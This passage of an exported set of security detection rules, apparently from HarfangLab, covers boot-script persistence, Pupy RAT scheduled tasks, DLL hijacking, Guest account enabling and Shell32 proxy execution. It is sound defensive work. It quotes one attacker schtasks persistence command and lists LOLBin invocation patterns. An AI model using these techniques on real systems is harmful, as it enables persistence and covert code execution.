boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to investigate the process that read the `rc.common` file for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/rc.common'\n - TargetPath: '/etc/rc.common'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b", + "rule_name": "RC Script /etc/rc.common Modified", + "rule_description": "Detects an attempt to modify the RC script /etc/rc.common.\nThe /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to investigate the process that read the `rc.common` file for suspicious activities.\n", + "rule_creation_date": "2022-12-26", + "rule_modified_date": "2025-04-14", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + 
"attack.t1037.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0c371a93-177d-4ced-82ad-dc148a365686", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.083926Z", + "creation_date": "2026-03-23T11:45:34.083928Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.083932Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/n1nj4sec/pupy", + "https://attack.mitre.org/techniques/T1053/005/" + ], + "name": "t1053_005_pupy_scheduled_task.yml", + "content": "title: Pupy Scheduled Task Persistence Added\nid: 0c371a93-177d-4ced-82ad-dc148a365686\ndescription: |\n Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\n Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\n It is recommended to download and investigate the 'elevator.xml' file.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/n1nj4sec/pupy\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 
2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Pupy\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/xml '\n - '/tn elevator'\n - '\\AppData\\Local\\Temp\\elevator.xml'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0c371a93-177d-4ced-82ad-dc148a365686", + "rule_name": "Pupy Scheduled Task Persistence Added", + "rule_description": "Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\nPupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\nIt is recommended to download and investigate the 'elevator.xml' file.\nIt is also recommended to investigate the parent process for suspicious activities.\n", + "rule_creation_date": "2021-02-08", + "rule_modified_date": "2025-08-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1053.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + 
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.084746Z", + "creation_date": "2026-03-23T11:45:34.084748Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.084752Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/RedDrip7/status/1545245625662418945", + "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_version.yml", + "content": "title: DLL Hijacking of VERSION.DLL\nid: 0c391c25-0ca4-4a33-a98e-d0de4cc1eee6\ndescription: |\n Detects a potential Windows DLL search order hijacking of VERSION.DLL.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n Imphash: '00000000000000000000000000000000' # mean we didn't get any info about the DLL\n\n exclusion_legitimate_dll:\n # old pascal/delphi \"version.dll\", not the MS ones (and upx packed..)\n sha256:\n - '31144e8b156fe87317073c48a09abcb033fda8dbdd96986c4abea8c00c00355f'\n - '3eba921ef649b71f98d9378dee8105b38d2464c9ccde37a694e4a0cd77d22a75'\n - '645ca9e88da21c63710a04a0f54421018df415a3d612112c71a255c49325c082'\n - 'd7ce1a67db5dee613760775ad4639ddb9ed2dd07f169996c78133820337d1aa3' # C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\VERSION.dll\n - 'a9a39c8c61d5cdcb9ea67e7ee5916d7f60dfe40b31474381cbdf0102f698fbb4' # Balatro\\version.dll\n\n exclusion_veeam:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n # SHA-256: 3d520df7824e332886a1307d3153e0fb5c2b85ac67a1e194ee3adb1bfbaecf8a\n # SHA-256: ccd18aa682718cd765840c249c10c9be4d41affd8fc7a590d5f25619a22814f5\n ImageLoaded: '?:\\Program Files (x86)\\Veeam\\Backup Transport\\GuestInteraction\\VSS\\VeeamGuestHelpers\\WinCoreCompatLayer\\version.dll'\n\n exclusion_signed:\n 
Signature:\n # ImageLoaded: 'C:\\Program Files\\QlikView\\Server\\QlikViewClients\\QlikViewAjax\\bin\\Version.dll'\n - 'QlikTech International AB'\n - 'ASUSTeK Computer Inc.'\n - 'IObit CO., LTD'\n - 'Veeam Software Group GmbH'\n\n exclusion_imageloaded:\n ImageLoaded:\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\version.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-version_*\\version.dll'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\forwarders\\version.dll'\n\n exclusion_app:\n ProcessImage|contains:\n - '\\App\\GlaryUtilities\\'\n - '\\App\\SketchUp 20??\\'\n - '\\App\\TreeSize\\TreeSize.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Glarysoft Ltd'\n - 'Trimble Inc.'\n - 'JAM Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6", + "rule_name": "DLL Hijacking of VERSION.DLL", + "rule_description": "Detects a potential Windows DLL search order hijacking of VERSION.DLL.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nBy putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-07-15", + "rule_modified_date": "2025-10-21", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"0c620fa1-5877-425b-b91e-920d723b4eab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591725Z", + "creation_date": "2026-03-23T11:45:34.591728Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591736Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dxcap.yml", + "content": "title: DLL Hijacking via dxcap.exe\nid: 0c620fa1-5877-425b-b91e-920d723b4eab\ndescription: |\n Detects potential Windows DLL Hijacking via dxcap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious 
activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxcap.exe'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dbghelp.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0c620fa1-5877-425b-b91e-920d723b4eab", + "rule_name": "DLL Hijacking via dxcap.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dxcap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + 
"rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.088943Z", + "creation_date": "2026-03-23T11:45:34.088945Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.088949Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest", + "https://attack.mitre.org/techniques/T1078/001/" + ], + "name": "t1078_001_guest_account_enabled.yml", + "content": "title: Guest Account Enabled\nid: 0c76fbf6-2adc-4728-bf4c-92b0f9d5c847\ndescription: |\n Detects the activation of the Guest account.\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate this action to determine 
its legitimacy and investigate any suspicious authentications using the guest account.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-501'\n\n condition: selection\nlevel: high\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847", + "rule_name": "Guest Account Enabled", + "rule_description": "Detects the activation of the Guest account.\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using the guest account.\n", + "rule_creation_date": "2024-01-04", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1078.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + 
"rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086416Z", + "creation_date": "2026-03-23T11:45:34.086418Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086422Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Libraries/Shell32/", + "https://attack.mitre.org/techniques/T1218/011/" + ], + "name": "t1218_011_suspicious_shell32.yml", + "content": "title: Suspicious Proxy Execution via Shell32\nid: 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\ndescription: |\n Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a LOLBin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - 
classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exec_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_exec_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_exec_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - 'ShellExec_RunDLL'\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_ordinal:\n CommandLine|contains:\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_folder:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n exclusion_share:\n ParentImage|startswith: '\\\\\\\\'\n\n exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - '\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n\n exclusion_jp2launcher:\n ParentImage:\n - '?:\\Program Files\\Java\\\\*\\bin\\jp2launcher.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\jp2launcher.exe'\n\n # https://www.berger-levrault.com/fr/\n 
exclusion_berger-levrault:\n ParentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_healthcare:\n ParentImage: '?:\\Program Files\\GE Healthcare\\Centricity\\\\*.exe'\n\n exclusion_xilinx:\n ParentImage: '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n\n condition: all of selection_exec_* and 1 of selection_suspicious_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5", + "rule_name": "Suspicious Proxy Execution via Shell32", + "rule_description": "Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\nThis binary can be used as a LOLBin in order to execute binaries or load DLLs.\nIt is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\n", + "rule_creation_date": "2022-12-15", + "rule_modified_date": "2025-10-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218.011" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": 
true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080575Z", + "creation_date": "2026-03-23T11:45:34.080577Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080581Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_bdservicehost.yml", + "content": "title: DLL Hijacking via bdservicehost.exe\nid: 0cde446e-6eec-4d9c-a4df-ad0b836c3406\ndescription: |\n Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdservicehost.exe'\n ProcessSignature: 'Bitdefender SRL'\n 
ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406", + "rule_name": "DLL Hijacking via bdservicehost.exe", + "rule_description": "Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-11-08", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0cf16516-206d-4746-b55e-291542898e67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": 
false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618982Z", + "creation_date": "2026-03-23T11:45:34.618984Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618988Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_klist.yml", + "content": "title: DLL Hijacking via klist.exe\nid: 0cf16516-206d-4746-b55e-291542898e67\ndescription: |\n Detects potential Windows DLL Hijacking via klist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
